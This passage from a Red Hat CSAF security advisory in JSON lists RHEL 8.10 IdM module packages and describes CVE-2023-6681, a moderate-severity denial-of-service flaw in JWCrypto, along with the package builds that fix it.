"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch"
},
"product_reference": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src"
},
"product_reference": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src"
},
"product_reference": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src"
},
"product_reference": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
},
"product_reference": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-6681",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-01-29T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2260843"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in JWCrypto. This flaw allows an attacker to cause a denial of service (DoS) attack and possible password brute-force and dictionary attacks to be more resource-intensive. This issue can result in a large amount of computational consumption, causing a denial of service attack.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "JWCrypto: denail of service Via specifically crafted JWE",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The identified vulnerability within the jwcrypto package, presents a moderate severity concern rather than a important one due to several mitigating factors. While the unbounded PBES2 Count value in PBKDF2 algorithms can potentially facilitate a Denial of Service (DoS) attack, its severity is tempered by the fact that successful exploitation requires specific conditions and considerable computational resources. Additionally, applications not reliant on PBKDF2 can easily exclude it from their algorithms list, further reducing exposure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
